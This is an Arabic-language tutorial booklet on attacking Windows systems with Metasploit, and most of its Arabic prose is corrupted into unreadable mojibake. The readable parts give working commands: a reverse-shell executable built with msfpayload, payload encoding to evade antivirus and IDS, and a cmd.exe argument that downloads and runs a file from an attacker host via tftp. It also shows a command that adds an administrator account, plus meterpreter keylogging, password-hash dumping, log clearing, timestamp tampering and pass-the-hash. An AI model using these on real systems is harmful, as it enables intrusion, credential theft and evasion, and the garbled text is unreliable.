Meta Sploit
Meta Sploit
هذا الكتيب يتناول اداه من اقوى ادوات الموجوده لدى مختبرين االختراق .
Metasploit
واالن اصبحت من االدوات اللتً ٌتطلب وجودها فً جهاز اي شخص مهتم بالحماٌه واالختراق .
كما ذكرت المٌتاسبلوٌت اداه وهذا ٌعنً اذا اتقنتها ال ٌعنً احترافك
الن االختراق بشكل عام ال ٌقتصر بأداه واحد فمن الممكن استخدام
اكثر من اداه لٌتم االختراق واالدوات اقصد بها من ادوات الخاصه الى ثغرات البرامج .
1
الجواب هو استخدام النظامٌن ,االختراق لٌس مقتصر على نظام معٌن بالعكس استخدام النظامٌن جنبا الى جنب ٌسهل من عملٌه
االختراق .
فمثال هنالك ادوات كثٌره ال ٌتم استخدامها الى عن طرٌق وندوز والعكس صحٌح ,وهنالك ادوات فً النظامٌن لكن استخدام
فأداه Metasploitهً افضل على اللٌونكس ,واالداه كانت موجهه الى نظام اللٌونكس لكن تم ضم االداه الى الوندوز بعدها بمده
ملفات Metasploit
ٚال ٠ؼشف فبئذجٗ ٌ ,زٌه اٌ َٛ١ساض ٔؾشض اٌٍّفبت ٚثؼل اٌّفب٘. ُ١
وّب روشت ثبٌّمذِٗ ,إٌظبَ ال , ُٙ٠اٌّ ٛ٘ ُٙاٌّغحخذَ ٌ ,ىٓ ثؼل االدٚات جى ْٛافنً ثبٌٕظبَ اٌفالٔ. ٟ
ؽخق١ب اس ٜاٌّ١حبعجٍ٠ٛث افنً ػٍ ٝأٌٍٛ١ىظ ٌ ,ىٓ ال ِبٔغ اعحخذاَ أٌٛذٚص.
root@silv3r00t:~#cd /pentest/exploits/framework3
ls
2
ساض ٔؾشض ؽشض عش٠غ ٌٍٍّفبت اٌّٛشٛدٖ,
data
tools
plugins
3
scripts
ٖش١غٚmeterpreter د ثٗ عىشثثٛشِٛ
lib
docum entation
ٍِٖفبت ٌٍمشاء
external
modules
________
ٌٍُّٙ ضٚٔش
exploits
التٛوٛذ ِٓ اٌجشج٠ذػُ اٌؼذ٠ٚ عٛٔ ِٓ ٌٗ اورشٚ ث٠ٍٛحبعج١ٌّدٖ ثبٛشٌّٛمقذ ثٗ اٌرغشات ا٠
HTTP,SSH,SMTP,FTP,TFTP,SMB,TCP,UDP etc
4
user interaction -3
هجؼب ل ٖٛاٌّ١حبعجٍ٠ٛث جىّٓ ف ٟاٌحعىُ ٚاٌجغبهٗ ثؤعحخذاَ اٌـ payloads ,جؼط١ه اٌؼذ٠ذ ِٓ اٌخ١بسات ٚا٠نب ثىحبثة
اعحغالي اٌرغشات .
ٚجٍمبٖ ِصشثٙب ػٍ ٝشٙبصٖ االخش ٠ٚؼشف اْ اٌرغشٖ ؽغبٌٗ ٌىٓ ا٠ؼ اٌغجت,,
أب الٌٛه ,اٌغجت اْ ٠single payloadشعً ِغ االعحغالي فؤرا وبٔث اٌرغشٖ جحطٍت ِغبظٗ ِؼshellcode ِٓ ٕٗ١
5
ٚوبْ اٌـ payloadاٌّخحبس ِٓ لجً اٌّٙبشُ اوجش ِٓ اٌّغبظٗ ف١ق١ش االعحغالي فبٌقٛ
ٔشٚض ٌٍربٔٚ ٟاٌٍ١ِّ ٛ٘ ٟض ثؾىً ِ ٛهج١ؼ ٟالْ ِجذأ ػٍّٗ ,اسعبي ٠stubم َٛثعصض ِىبْ ف ٟاٌزاوشٖ
auxiliary
encoders
nops
ِف١ذٖ ٌّٓ ٠ىحؾف ذغشات buffer overflowالٔٗ ثجغبهٗ ٠غبػذ ثؼل اٌّشات اٌؾخـ ال٠صبد ػٕٛاْ اٌؼٛدٖ.
6
ادوات Metasploit
ٌٓ اجىٍُ ثؾىً ِفقً ف٘ ٟزا اٌذسط ٚرٌه ٌغججٚ ٓ١االٚي عٕعحبز وح١ت اخش ػٓ ٘زا اٌمغُ ٚا٠نب ِؼٍِٛبجِ ٟعذٚدٖ ٚال
اس٠ذ اْ اؽحث اٌمبسئ ا ٚام١ف ِؼٍِٛبت ٌؼٍٙب خبهئٗ.
ف٘ ٟزا اٌمغُ عٕحطشق ٌرالخ ادٚات ٌِّ ّٗٙىحؾف ٓ١اٌرغشات ثؾىً خبؿ ٚا٠نب ٌّٓ ٠عت االهالع ثؾىً ػبَ.
طبعا هذه تستلزم خبره الكتشاف الثغرات ,لذلك دائما مشروع المٌتاسبلوٌت مهم لمكتشفً الثغرات من الدرجه االولى
msfpescan -1
msfelfscan -2
msfmachscan -3
٠1- msfpescan :غحخذَ ٌفعـ ٍِفبت DLLsا ٚاٌّىحجبت اٌّؾحشوٗ اexe ٚأل٠صبد ػٕب ٓ٠ٚاٌؼٛدٖ ِٚب روش ِٓ لجً.
ٌ2- msfelfscan :فعـ ٍِفبت اٌحطج١م ٗ١ف ٟأٌٍٛ١ىظ ٚاٌحٍِ ٟ٘ ٟفبجٙب elf
7
ٌmsfmachscan -3 :فعـ ٍِفبت اٌحطج١م ٗ١ف ٟاٌّبن.
msf opcode
ِ ٟ٘ٚب ٠مقذ ثٙب ٚoperation codeجؼٕ ٟسِض اٌؼٍّٗ١
ِmsfopcodeحقً ِغ لبػذٖ اٌج١بٔبت اٌح ٟجع ٞٛػٍ ٝسِٛص اٌؼٍّ١بت ثّٛلغ اٌّ١حبعجٍ٠ٛث ,االداٖ ال جؾحغً ٌىٓ
ع١عذذٙٔٛب
غ١ش = e 3
هجؼب ِٓ ظغٓ اٌعع إٔ ٟوحجث ِٛمٛع لجً عٕٗ ٚاورش ػٍِ ٝب اظٓ
ِٓٚظغٓ اٌعع وبْ اٌؾشض فذِٚ ٛ٠شفٛع ػٍِ ٝغبظٗ خبفٗ ثٟ
لجً اٌّؾب٘ذٖ
ساض ٔالظع اٌرغشٖ ِب جؾحغً ٌ ,ىٓ ِغ اٌجعد ف ٟلبػذٖ ث١بٔبت اٌّ١حبعجٍ٠ٛث ساض جؾحغً ػٍ ٝاٌرغشٖ ,
فبظت اٌرغشٖ ع ًٙػٍٕ١ب االِش ٚوحت سِض اٌؼٍّjmp esi ٗ١ػبدجب اٌؾغً ٠ى٠ ْٛذ. ٞٚ
أب فعقث اٌٙذف ثحبػ ٟثـ ٚ nmapاجنط اْ اٌصٙبص ٠ؾحغً ػٍWin xp ٝاِب sp 1 or sp 2
اٌرغشٖ جؾحغً ػٍٚ sp 1 ٝظ ٓ١جُ اعحغالٌٙب ٌُ ٠عذخ ؽٟء ,ثّؼٕ ٝاْ ٔظبَ اٌٙذف Win xp sp2
ٚالظظٛا و١ف وحجحٗ ثبٌؼىظ ,هجؼب وحجحٗ ثبٌؼىظ الٔٙب جذخً ف ٟػبٌُ االعّجٍٟ
اٌرغشٖ: http://milw0rm.com/exploits/3925
اٌصبٔت اٌص١ذ اْ اٌّ١حبعجٍ٠ٛث ِفحٛض اٌّقذس ٌ ,زٌه ثؤِىبٔه اٌحؼذ ً٠ػٍ ٝاٌرغشات اٌح ٟثذاخٍٗ.
8
HQ ٍٝؽب٘ذٖ ػ
http://www.youtube.com/watch?v=aAd6d2uIVVE
ٓفٛٙثحٚ َٛ وٛ٠ث ٌىٓ اٌفذ٠ٍٛحبعج١ٌّلغ اٌّٛ ُ٠ً اٌمذ٠بَ اٌغحب٠ هللا ا: طبس٠خبسز اال
1- msfrpcd
msfrpc -2
msfd -3
XMLRPC يٛوٛغحخذَ ثشج٠ هجؼب, ً١ّ اٌؼٟٔث اِب اٌرب٠ٍٛحبعج١ًٌّ ا١ؼًّ خبدَ ٌحؾغ٠ يٚاال
root@silv3r00t:/pentest/exploits/framework3# ./msfd -h
OPTIONS:
9
A
اٌغّبض ٌال٠ج١بت اٌحبٌ.ٗ١
B
ظظش اال٠ج١بت اٌحبٌ.ٗ١
a
ٚمغ اال ٞث ٟاٌخبؿ ثه ثذي ِٓ ٚloopbackاٌٍز127.0.0.1 ٛ٘ ٞ
f
جؾغ ً١اٌخذِٗ ٌىٓ ٌ١غث ثؾىً خف , ٟثذ٘ ْٚزا اٌخ١بس اٌّ١حبعجٍ٠ٛث ساض ٠ؾحغً ٌىٓ ف ٟاٌجشٚع١ظ ٚال ساض ٠ى ْٛثّٓ١
ٌٍّغحخذَ .
h
ِغبػذٖ
p
s
msfencode -2
هش٠مٗ ػٍّٗ.
./msfpayload payload var=val
= payloadاعُ اٌجبٍٛ٠د
10
و١ف ٔؼشف ِحغ١شات اٌـ payload؟
خز٘ب لبػذٖ ثذ ْٚجفى١ش دائّب ا ٞاٌجبٍٛ٠د ٠غحخذَ اجقبي ػىغ٠reverse ٟعحبز lhost,lport
bind_shell
اٌعقٛي ػٍ ٝؽً ثؤجقبي ِجبؽش
reverse_shell
اٌعقٛي ػٍ ٝؽً ثؤجقبي ػىغٟ
اٌجؼل ٠حغبئً ٠مٛي ٌّبرا اعحخذَ ٌmsfpayloadؼًّ ٍِفبت ٚexeأب ػٕذshell access ٞ
فع١ط ػٕذن ؽً ٌىٓ اٌؾً ٘زا ظقٍحٗ ػٓ هش٠ك ذغشٖ خبسز اٌّ١حبعجٍ٠ٛث ,اٌرغشٖ جطٍت ِغبظٗ ِؼ ِٓ ٕٗ١اٌـ shellcode
فغ١شٖ ثع١د ِب جمجً meterpreter , vncinject
هجؼب االْ ِب ف ٗ١اال ظً ٚاظذ ٛ٘ٚجعّ meterpreter , ً١ثىً جؤو١ذ ساض ٠ىexe ْٛ
11
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe
~~~~~~~~~~~~~~~~
msfencode :
shellcode
ٌٟحخط
AV ٚاIDS
PHP:دٛو
Usage: ./msfencode <options>
OPTIONS:
12
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The format to display the encoded buffer
-x <opt> Specify an alternate win32 executable template
ٛ٠ْ فذٛى٠ اٌؾشض ساضٚ , امعٗ شذا ٌىٓ ساض جٕؾشضٚ ٖاالدا
ٟٗ جخط١ف١وٚ ٖحىٍُ ػٓ ٘زٖ االدا٠ٚ ً شذا١ّ شٛ٠شذت فذٚ لجً ِذٖ أب
http://vimeo.com/7969055
. غ٠اخحجبس عش
ٌَّبرا ٌُ اعحخذ
msfcli
غ اعحخذاِٗ ؟١ اعحطٟٔ ِغ ا, ٘زا اٌّربيٟف
./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe
netcat
msfcli
13
مٗ اٌحٕقث ٌالجقبي٠هش
14
استخدام Metasploit
ٟ٘ٚ
1- msfconsole
msfcli -2
msfgui -3
msfw eb -4
ٟ٘msfconsole:اٌٛاشٗ اٌّفنٍٗ ٌذ , ٞاٚال الٔٙب جحؼبًِ ِغ عطش االٚاِش ,ذبٔ١ب اعحخذاَ اٚاِش
أٌٍٛ١ىظ ثذاخٍٙب ,ثّؼٕ ٝاخش ثؤِىبْ اٌفعـ ٚاٌحؼبًِ ِغ اٚاِش أٌٍٛ١ىظ ٚأث ثذاخٍٙب .
msfcli :اداٖ لٔ ِٓ ٗ٠ٛبظ ٗ١اٌفىشٖ ٚعش٠ؼٗ ا٠نب ,ثؤِىبٔه اعحغالي اٌرغشٖ ثذ ْٚاٌذخٛي اٌٝ
msfconsle ,اعحغالي اٌرغشٖ ٠حُ ثغطش ٚاظذ ,ػٍ ٝظغت اػحمبد ٞاالداٖ ٘زٖ
msfgui :اٌّ١حبعجٍ٠ٛث ثٛاشٗ سعٌ ,, ٗ١ِٛىٓ ال أقط ثٙب ثحبجب اٚال اٌٛاش ٗٙثط١ئٗ
ٚmsfwe b :اشٙة سعٌ , ٗ١ِٛىٓ افنً ِٓ عبثمحٙب ,ال افنً اعحؼّبٌٙب الٔٙب ثط١ئٗ ا٠نب
1- msfconsole
1- show
االِش ٘زا ٠مقذ ثٗ اػشك عٛاء payload encoder nops exploits auxiliary , options all
ِربي :
show exploits
ػشك اٌرغشات
show payloads
ػشك payloads
15
show encoders
encoders ػشك
show nops
nops ػشك
show auxiliary
auxiliaryػشك
show options
بسات١ػشك اٌخ
2- use
:ِربي
use exploit/windows/smb/msdns_zonename
use auxiliary/scanner/smb/version
3- info
:ِربي
info exploit/windows/smb/msdns_zonename
ٚا
use exploit/windows/smb/msdns_zonename
16
ذُ
info
set -4
ِربي
connect -5
back -7
اٌؼٛدٖ ٌٍٛساء
ِربي:
msf exploit(msdns_zonename) > back
> msf
show option
17
exploit
show advanced
show evasion
ثؼل اٌّشاتٚ, ة الْ ِٓ وً ذغشٖ ٌرغشٖ جخحٍفٍُٛ اال ارا وٕث فبُ٘ اٌّطٙبساج١ش خ١١ِب أقط ثحغ
,حه١بص معٙ شٍٝبسات هجؼب ٘زا ثٕبء ػ١ً ثؼل اٌخ٠اٌرغشٖ ِب جؾحغً اال ثؼذ جؼذ
show targets
PHP:دٛو
Usage: ./msfcli <exploit_****> <option=value> [mode]
====================================================
Mode Description
---- -----------
(H)elp Youre looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
ِٖبت اٌرغشٍِٛؼS =
ٖبسات اٌرغش١خO =
ًٖ اٌرغش١جؾغE = ِِ
18
./msfcli exploit/windows/*** payload=windows/meterpreter/** rhost=A.B.C.D lh
ost=1.1.1.1
ٔنغ
rhost=
payload=
, ك١جبثغ اٌحطج
http://www.youtube.com/watch?v=vF3ZwD0vssk
19
التعامل مع الثغرات.
ِRPORT
ٚجؼٕ ٟدائّب ثٛست اٌنع , ٗ١غبٌجب ِب أقط ثحغ١١شٖ اال ارا وبٔث اٌرغشٖ جؼًّ ػٍ ٝاورش ِٓ ثٛست
ٔىحت
show options
20
ٚLHOSTجؼٕip ٟاٌّٙبشُ ,
ٔٚؾغً اٌرغشٖ
ِب اجٛلغ اْ ف ٟاداٖ اعحغالٌٙب اع٘ ِٓ ًٙزا ,ظح ٝاٌجب٠ض ْٚاٌحؼبًِ ِؼٗ افؼت
ٔ1-خحبس اٌرغشٖ
use windows/smb/smb
show option
Abc setالمتغير
ٔ4-خحبسpayload
set payload windows/meterpreter
21
ٖٔغحغً اٌرغش6-
exploit
, َٛصٌٙحه لجً ا١ افعـ مع, ك اٌفعـ٠ ػٓ هش, بٌٙب ؽغبٙٔٔؼشف اٚ ٖف ٔغحغً اٌرغش١ت و١ه
فٚاْ إٌظبَ ِؼشٚ ضٛست ِفحٛصُ لجً جحؤوذ ِٓ اْ اٌجٙال جamap , ٚاnmap nessus ػٕذن
smb ِٗ ٌىٓ ارا وبْ خذ, لغٛه إٌظبَ اٌّح١ؼط٠ٚnmap ك٠ِّىٓ جخّٓ إٌظبَ ػٓ هش
msf auxiliary(version) > nmap -PN 192.168.1.2 -p 445 -O[*] exec: nmap -
PN 192.168.1.2 -p 445 -O
22
Warning: OSScan results may be unreliable because we could not find at least
1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows Vista|2008
OS details: Microsoft Windows Vista SP0 or SP1 or Server 2008 SP1
Network Distance: 1 hop
ِٓ80 %إٌٛػ٘ ٗ١زٔ ٞبشعٗ ٚ ,ارا سشؼث ٌٙزٖ اٌرغشات ساض جخحشق ِ ,رً جغشات اٌّحقفط
خبسز اال٠طبس :ؽغً اداٖ ٌtcpdumpحؼشف اْ ادٚاجه ؽغبٌٗ ِ ,رال ٌ ٛاعحغٍٕ١ب اٌرغشٖ ٚاٌّ١حبعجٍ٠ٛث جٛلف فصؤٖ ا ٚفبس
ا ٞؽٟء ,ساض جىِ ْٛشالت اٌحشاف١ه ٚجؼشف ,
فشاظٗ أب فبست ِؼِ ٟؾىٍٗ ِغ nmapفعـ شٙبص ٚاخزت عبػٗ ٚسثغ ٚأب أحظش ,
nmapجٛلف فصؤٖ ٚأب ِب ادس , ٞاخزت أحظش ذُ ؽغٍث ٚtcpdumpػشفث اْ اٌـ nmap
ِحٛلفٌ ,زٌه ِٓ االفنً لجً جغ ٞٛا٘ ٞص َٛؽغً ٌtcpdumpحؼشف اْ ادٚاجه ؽغبٌٗ ػٍ ٝاٌٛشٗ اٌقع١ط
ثؼل اٌّشات ٠ى ْٛاٌجشٔبِس غ١ش ِٛشٛد ٘ٚزٖ ٌ١غث ثبٌّؾىٍٗ فٕٙبٌه اٌؼؾشات ِٓ اٌرغشات إٌخحٍفٗ .
23
ثؼل اٌجٛسجبت جىِ ْٛعصٛثٗ ٚثؼنٙب ال ِ ,رً جغشات SMBجغحخذَ اورش ِٓ ثٛست
ِٓ اٌقؼت اٌحؼبًِ ِغ ٘زٖ اٌّؾىٍٗ ٌىٓ االفنً ٘ ٛاٌحؼبًِ ِغ evasionف ٟاٌّ١حبعجٍ٠ٛث
٘زٖ اٌّؾىٍٗ ٔبدسا ِب جعذخ ٟ٘ٚ ,ػٕذِب جغحغً اٌرغشٖ ِّ ,ىٓ ٠ق١ش ؽٟء غ١ش ِحٛلغ
شٙبصِ ٞب ظذذحٗ ٠ؼٕ ٟاٌرغشٖ ٠صت اْ جؾحغً ,اعحغٍ١ث اٌرغشٖ ٚ ,فصؤٖ اٌصٙبص ٚلف ػٓ اٌؼًّ ٌزٌه
٘زا افجط ِؼشٚف ,شّ١غ االشٙضٖ خٍف ٔبت ِ ,بف ٗ١ا ٞؽخـ اال ٠ٚغحخذَ ِٛدَ
ٌزٌه ٠صت اٌحؤوذ اْ اٌجٛست ِفحٛض ٚا٠نب جؤوذ اْ جغحخذَ اجقبي ػىغ.ٟ
24
اداه Metasploitليست الطريقه الوحيده لالختراق.
اٌّ١حبعجٍ٠ٛث اداٖ لٌ ٗ٠ٛىٓ ٕ٘بٌه ذغشات ٌ١غث ثبٌّ١حبعجٍ٠ٛث ٚثؼل اٌّشات جؼحجش ِٓ 0-day
http://www.exploit-db.com/exploits/11204
ػٍ ٝاٌؼّ َٛافحط اٌرغشٖ ,ساض جالظع ActiveXا ٚظحhtml , ٝثؼذ اٌّالظظٗ ساض ٔؼشف اْ اٌرغشٖ جغحغً
ػٓ هش٠ك اٌّحقفط ,ثّؼٕ ٝادق اٌنع ٗ١ساض ٠حقفط ٘زٖ اٌقعفٗ ٔٚغحغً ػٓ هش٠مٙب
25
ٔالظع اْ اٚي اٌغٕ١بس, ٛ٠ٚ
دائّب ثؤعحغالي اٌرغشٖ ٠ىحت اٌّىحؾف = shellcodeاِّ ٚىٓ ٠ىحت االعُ غ١ش ٌىٓ دائّب جىحت ػٍ٘ ٝزا اٌؾىً .
shellcodeف٘ ٟزٖ اٌرغشٖ ِىحٛة ػٍ ٝاٌصبفبعىشثث ِّٚىٓ جغحخذَ اداٖ msfpayload .
اٌرغشات جٕمغُ اٌ ٝلغّ ٓ١اعبع ٓ١١غ١ش االلغبَ ف ٟاٌذسط اٌربٔ. ٟ
جٛم١ط :اٌمغّ٘ ٓ١زا ػبَ ثّؼِٕ ٝربي ِغ فبسق اٌحؾج , ٗ١االٔغبْ ٠ب ِغٍُ ٠ب وبفش
ارا وبْ ِغٍُ ٠ىِ ْٛرال عٕ ٟا ٚؽ١ؼٚ ٟارا وبْ وبفش ِّىٓ ٠ىٛٙ٠ ْٛدٔ ٞقشأ. ٟ
اٌُّٙ
ِٓ اعّٙب
26
victim -----------------> attacker
اعحغالي اٌرغشات جىِ ْٛىحٛثٗ ثٍغبت ِخحٍفٗ perl ,python ,c , ruby etc
ٚغبٌجب وبجت االعحغالي ٠ىحجٙب ثبٌجذاٚ .. ٗ٠ا٠نب ثؤِىبٔه ِؼشفحٙب ثٕفغه .
http://www.exploit-db.com/exploits/11151
ثؼل اٌرغشات جغحؼًّ ٌshellcodeىٓ ظٔ ٓ١غحخذَ bindshellساض ٠عظشٖ اٌصذاس إٌبسٞ
اٌجؼل ٠مٛي ٔغحخذَ reverseshellا ٚاجقبي ػىغٔ , ٟغحخذَ ٌىٓ ثؼل اٌّشات اٌصذاس إٌبس٠ ٞعظش االجقبي اٌخبسز .
اٌرغشٖ اٌٍ ٟثبٌغبثك جغحؼًّ ٌcode executionزٌه ساض ٔغحخذَ ثؼل االٚاِش اٌٍ ٟجف١ذٔب ثؤخحشاق
اٌنع. ٗ١
اٚال اٌرغشٖ جغحخذَ ٌحؾغِ ً١رال cmd.exeثّؼٕ ٝاخش ثؤِىبٕٔب اٌحعىُ ثبالٚاِش
27
tftp .ك٠ٍٗ ػٓ هش١ِٓ ذُ جؾغٚ ً اٌٍّف١ّجع1-
ُبشٌّٙبص اٙ شٍٝػtftp server نب٠اٚ ٗ١بص اٌنعٙ شٍٝػtftp client دٛشٚ ِٗطٍجبج
ْ ِرالٛى٠ ٌٗاعحؼّب
PHP:دٛو
arg1="c:\WINDOWS\system32\cmd.exe /c tftp -
i attacker_IP GET file.exe && file.exe"
ِربي
,, ٌٍعغبةٟسد ظمٛاٌجبع
28
echo bin >> silv3r00t.txt
ftp -s:silv3r00t.txt
ً اٌٍّف١ّجع
silv3r00t.exe
..ٔؾغً اٌٍّف
. ٗ ٔفظ اٌؾجىٍْٝ ػٛى٠ ُبشٌّٙب اْ اٙمٗ ٌىٓ ِؾىٍح٠ً هشٙصس اعٛ٠ ٗامبف
ِربي
arg1="c:\WINDOWS\system32\cmd.exe /c net user silv3r00t 123 /add && net local
group Administrateurs silv3r00t /add "
29
.ماذا بعد االختراق
.ث٠ٍٛحبعج١ٌّك ا٠لغ أٗ أغعت االْ ِٓ فشٛاجٚ skape ٝذػ٠ لبَ ثجشِصحٗ ؽخـ, ٖ اٌزاوشٟٕار ٌُ جخ
) جُ اخحشالٗ (ثؼل اٌّشات الٞعظ اٌزٚ اٌجشٟحُ ظمٕٗ ف٠DLL ػجبسٖ ػٓ ٍِفبتٛ٘
عظٕٚعمٓ ثٕفظ اٌجش٠ حش ساض٠شثش١اٌّح563 , ْٛى٠ عظ ساضٚاٌجشٚFTP ِٗ اخش ؽغٍٕب خذٕٝثّؼ
) ٗ٠ٛضٖ ل١ِ ( ! بسدعه اال ارا اِشجٗ أثٌّٙظ ا٠ الٚ ٖ اٌزاوشٍٝؽغٍٗ ػ
be in touch with the meterpreter جٗ وً ِشٖ ٌزٌهٛ لٟذ ف٠ض٠ٚ ش٠ٛٗ جط١ش ف١ق٠ عٛوً اعج
! ٌهٟٔحشن اٌحصشثٗ ٌٍجبلٚ بِٕٙ غ ٌجؼل٠ اٌغشٍٝب ٌىٓ ساض اؽشض ػٙؼ١ّب شٙثّىؤٔه جصشثحٚ , ٖذ٠اِشٖ ػذٚا
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel
30
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
upload Upload a file or directory
Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Get as many privileges as possible
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target pr
ocess
sysinfo Gets information about the remote system, such as OS
31
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
idletime Returns the number of seconds the remote user has been idl
e
keyscan_dump Dump they keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
setdesktop Move to a different workstation and desktop
uictl Control some of the user interface components
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter >
, ٌّّٗٙٔؤخز ا
sysinfo
XP or vistaِٗحٕب الصَ ٔؼشف ٔظب١ الْ لجً ِب ٔؾحغً ثنع, ّٗ شذاِٙ ٞ٘زٚ , َِبت إٌظبٍٛخشز ٌٕب ِؼ٠
! ًش اٌؾ١ط٠ ساضٚ XP , ٞػبدٚ vista َت ثبٌٕغجٗ ٌٕظب٠ء ِشُٟ جخحٍف ِّىٓ جؼًّ ؽٙح٠الْ ظّب
shutdown /reboot
32
اثحؼذ ػٓ ٘ز ٞثمذس اٌّغحطبع ,الْ ِؼ ِٓ فبٌعٕب ٔغٍك اٌصٙبص أ ٚؼ١ذٖ !
reg
اٌحؼذ ً٠ػٍ ٝاٌش٠صغحش ٞا ٚلشاجٗ ِ ,ف١ذٖ شذا عٛاء جشو١ت ١ٌ backdoorحُ ػٍّٗ وً ثؤٔحظبَ !
cd
اٌحٕمً ث ٓ١اٌّصٍذات
lcd
getwd / pwd
ls
اعحؼشاك اٌٍّفبت
cat
download / upload
سفغ اٌٍّفبت ا ٚجٕضٍٙ٠ب ٘ٚز ِّٗٙ ٞعٛاء ٌشفغ ِرال backdoorsاٌ ٚحٕضٍِ ً٠فبت ٌِ ّٗٙذ ٜاٌنع! ٗ١
mkdir /rmdir
edit
33
getuid
execute
kill
لحً ثشٚعظ
ps
اعحؼشاك اٌجشٚعظ
shell
ipconfig
portfwd
ل ٗ٠ٛا٠نب ,جؼًّ ٌٍ forwardجبوث ِٓ شٙبص اٌنع ٗ١اال شٙبص اخش (ِٓ ثٛست وزا اٌ ٝثٛست وزا ػٍ ٝاٌصٙبص االخش)
route
use
run
34
جؾغ ً١عىشثحبت اٌّح١شثش٠حش ,اٌغىشثحبت ل ٗ٠ٛشذا
idltime
االِش ٘زا ثجغبهٗ ٠ ,ؾٛف اٌنعِ ِٓ ٗ١حىِ ٝب ٌّظ اٌى١جٛسد ٚاٌّبٚط
اٌجؼل ٠مٛي ِبٌٗ فب٠ذٖ ,أب الٌٛه ٌٛ ,اْ اٌنع ٌٗ ٗ١عبػحِ ٓ١ب ٌّظ اٌى١جٛسد ٚاٌّبٚط !
uictl
hashdump
اداٖ خ١بٌٗ فشاظٗ ,فبئذجٗ اظٙبس اٌٙبؽبت اٌّٛشٛد ف ٟلبػذٖ ثٕ١بت SAM
35
فٛائذٖ ال جعق ,, ٝاٚال اعحخشاز ثبعٛسد االدِٓ ,اعحخذاَ windows/smb/psexec
ا ٚثّب ٠ؼشف pass the hash attack ,جشو١ت خذِٗ جٍٕث ثذ ْٚػًّ ٛ٠صس شذ٠ذ !
36
ِرً ِب جؾٛف , ْٛػشفٕب اٌجبعٛسد
فً الختام اتمنى ان ىذا الكتٍب افاد البعض ولو بشًء الٍسٍز ,وال ارٌذ مه وراء ىذا الكتٍب اال الذعوه بالمغفزه والزحمو لً
ولوالذي .
P0C T34M
My sites: arab4services.net and p0c.cc
37